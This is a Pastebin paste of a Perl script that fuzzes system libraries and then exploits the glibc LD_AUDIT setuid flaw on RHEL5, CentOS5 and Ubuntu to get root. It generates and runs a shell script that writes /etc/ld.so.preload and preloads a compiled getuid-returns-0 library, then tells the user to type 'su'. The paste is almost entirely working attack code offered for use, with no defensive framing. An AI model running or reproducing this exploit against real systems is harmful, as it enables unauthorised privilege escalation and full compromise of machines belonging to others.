API tools faq
paste
View difference between Paste ID: Qv0kZZwk and khpqbqkL
SHOW: | | - or go back to the newest paste.
1
#!/usr/bin/perl
2
use POSIX;
3
$ptxt="
4
5
 [The GNU C library dynamic linker will dlopen arbitrary DSOs during setuid loads]

6
 [desc: Fuzz and exploit for RHEL5 / CentOS5 / Ubuntu]

7
8
";

9
print $ptxt;

10
our $old_fh=select(STDOUT); $|=1; select($old_fh);

11
@libdirs=("/lib"); # you can add your own paths to lib folder here

12
$tempdir="/tmp/fuzz/"; # temp directory

13
mkdir($tempdir);

14
15
#make some ascii

16
$total=0;

17
foreach $libdir (@libdirs) {

18
                opendir(my $dir, $libdir);

19
                @lf = readdir($dir);

20
                closedir $dir;

21
                $total=$total+scalar(@lf)-2;

22
}

23
$step=ceil($total/50);

24
$stepp=0;

25
print "0%"." "x6 ."20%"." "x6 ."40%"." "x6 ."60%"." "x6 ."80%"." "x6 ."100%\n";

26
print "\[";

27
foreach $libdir (@libdirs) {

28
                opendir(my $dir, $libdir);

29
                @libfiles = readdir($dir);

30
                closedir $dir;

31
                foreach $libfile (@libfiles) {

32
			       $stepp++;

33
			       if ($stepp==$step) {print ".";$stepp=0;}

34
                               if (($libfile ne ".") && ($libfile ne "..")) {

35
36
                                               @dump=`strings $libdir\/$libfile`;

37
                                               foreach $dline (@dump) {

38
                                                               if ($dline=~/^([A-Z\_0-9]+)$/) {

39
                                                                              chomp($dline);

40
                                                                              $ccc=`LD_AUDIT="$libfile" $dline="$tempdir$libfile-$dline" ping&>/dev/null`;

41
                                                               }

42
                                               }

43
                               }

44
                }

45
46
}

47
print "\]\n";

48
49
print "Fuzzing done. Thank you for using!\n";

50
51
opendir(my $dir, $tempdir);

52
@fuzzList = readdir($dir);

53
closedir $dir;

54
$libToExploit="";$argToExploit="";

55
if (scalar(@fuzzList)>2) {

56
	foreach $fuzzFile (@fuzzList) {

57
		if ($fuzzFile ne "." && $fuzzFile ne "..") {

58
			my ($lib,$param)=$fuzzFile=~/(.*)-(.*)/;

59
			print "Success: vuln lib - $lib ; arg - $param\n";

60
			if ((-e "$tempdir$fuzzFile") && (!-d "$tempdir$fuzzFile")) {

61
				$libToExploit=$lib;

62
				$argToExploit=$param;

63
			}

64
		}

65
	}

66
} else {

67
	print "Fail. No vuln libs found. Try another target ;)\n";

68
	exit();

69
}

70
71
$shCode=qq(#!/bin/sh

72
umask 0

73
LD_AUDIT=EXP_LIBRARY EXP_ARGUMENT=/etc/ld.so.preload ping

74
echo "[+] creating /tmp/getuid.so"

75
echo "int getuid(){return 0;}" > /tmp/getuid.c

76
gcc -shared /tmp/getuid.c -o /tmp/getuid.so

77
echo "/tmp/getuid.so" > /etc/ld.so.preload

78
);

79
80
if ($libToExploit ne "" && $argToExploit ne "") {

81
	$shCode=~s/EXP_LIBRARY/$libToExploit/gi;

82
	$shCode=~s/EXP_ARGUMENT/$argToExploit/gi;

83
	open(SH,">spl.sh");

84
	print SH $shCode;

85
	close(SH);

86
	chmod(0755,"spl.sh");

87
	system("./spl.sh");

88
	print "Hehe.. Type 'su' and be awesome!\n";

89
}
        

    


            


                                


        

            



                
    

        Public Pastes
    

    
            

    

                    

        

    





    


    
    
    
    
    
    
    
    




    


    



                

            We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.             OK, I Understand
        

    
                

            

                
                    
                
            

            

                Not a member of Pastebin yet?

                Sign Up, it unlocks many cool features!